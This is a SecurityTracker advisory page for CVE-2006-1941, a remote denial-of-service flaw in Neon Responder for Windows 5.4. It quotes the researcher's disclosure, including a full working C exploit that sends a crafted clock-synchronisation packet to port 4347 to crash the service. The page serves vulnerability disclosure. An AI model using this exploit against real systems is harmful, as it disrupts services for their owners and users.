SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Neon Responders Vendors:   Neon Software
Neon Responders for Windows Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1015950
SecurityTracker URL:  http://securitytracker.com/id/1015950
CVE Reference:   CVE-2006-1941   (Links to External Site)
Updated:  Nov 29 2009
Original Entry Date:  Apr 18 2006
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 5.4
Description:   A vulnerability was reported in Neon Responders. A remote user can cause denial of service conditions.

A remote user can send a specially crafted 'Clock Synchronisation' packet to port 4347 on the target system to cause the target service to crash.

The vendor has been notified.

Stefan Lochbihler discovered this vulnerability.

Impact:   A remote user can cause the target service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.neon.com/NRwin.shtml (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Neon Responder (Dos,Exploit)

Author:                          Stefan Lochbihler
Date:                             17.04.2006
Affected Software:         Neon Responder for Windows
Software                        5.4
Software                        http://www.neon.com/NRwin.shtml
Attack:                           Dos



Overview:
Neon Responders greatly enhance the functionality of LANsurveyor
by providing LANsurveyor with direct access to computers with the
Responder client installed. This direct access allows LANsurveyor
to provide complete hardware and software asset reports, distribute
software, and directly manage the client computers, either
individually or as a group.


Details:
Through a specially crafted "Clock Synchronisation" packet an
access violation occur and Neon Responder stops immediately.




Exploit:
/* Stefan Lochbihler*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32")

#define PORT 4347
char CLOCK_MSG [] = 
"\x00\x0e\x5a\x00\x4c\xe9\x24\xb1\x17\x88\x40\x84";   //Password = ""

void usage (char*);
void endpgr (char *,SOCKET, char*);
unsigned long gethost (char *);


int main(int argc, char *argv[])
{
 
    WSADATA wsa;
    SOCKET client;
    sockaddr_in peer;
    WORD wsVersion;

    char sendbuffer[16]="";
    char recvbuffer[16]="";
    unsigned long host=0;
    int err=0;

    if(argc<2)
      usage(argv[0]);

    printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler 
~~~~~~\n\n");


    if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa)!=0)
    {
        printf("WSAStartup() fail\n");
        exit(0);
    }

    printf("%s:[+] Try to create socket\n",argv[0]);
    client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(client==INVALID_SOCKET)
       endpgr(argv[0],client,"[-] socket() fail");

    printf("%s:[+] Lookup host\n",argv[0]);
    if(!(host=gethost(argv[1])))
       endpgr(argv[0],client,"[-] host not found !");

    peer.sin_family = AF_INET;
    peer.sin_port = htons(PORT);
    peer.sin_addr.s_addr = host;
    
    printf("%s:[+] Connect to %s\n",argv[0],argv[1]);
    err=connect(client,(SOCKADDR*)&peer,sizeof(struct sockaddr_in));
    if(err)
      endpgr(argv[0],client,"[-] connect() fail");

    memcpy(sendbuffer,CLOCK_MSG,sizeof(CLOCK_MSG));
    
    printf("%s:[+] Try to send packet\n",argv[0]);
    err=send(client,sendbuffer,sizeof(sendbuffer),0);
    err=recv(client,recvbuffer,sizeof(recvbuffer)-1,0);

    endpgr(argv[0],client,"[+] End successfully");

    return 0;

}

void usage(char *pgrname)
{
printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler ~~~~~~\n\n");
printf("%s: <Targethost>\n",pgrname);
exit(0);
}

void endpgr (char *pgrname, SOCKET client,char *msg)
{
    printf("%s:%s\n",pgrname,msg);
    WSACleanup();
    closesocket(client);
    exit(0);
}

unsigned long gethost(char *targethost)
{
unsigned long host=0;
hostent *phost=NULL;


host=inet_addr(targethost);
if(host==INADDR_NONE)
{
    if((phost=gethostbyname(targethost))==NULL)
       return 0;
    host=*(unsigned long*)phost->h_addr;
}

return host;   
}


Vendor Status: The Vendor is informed !


Discovered and Copyright by
Lochbihler Stefan
http://www.xion-security.at

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC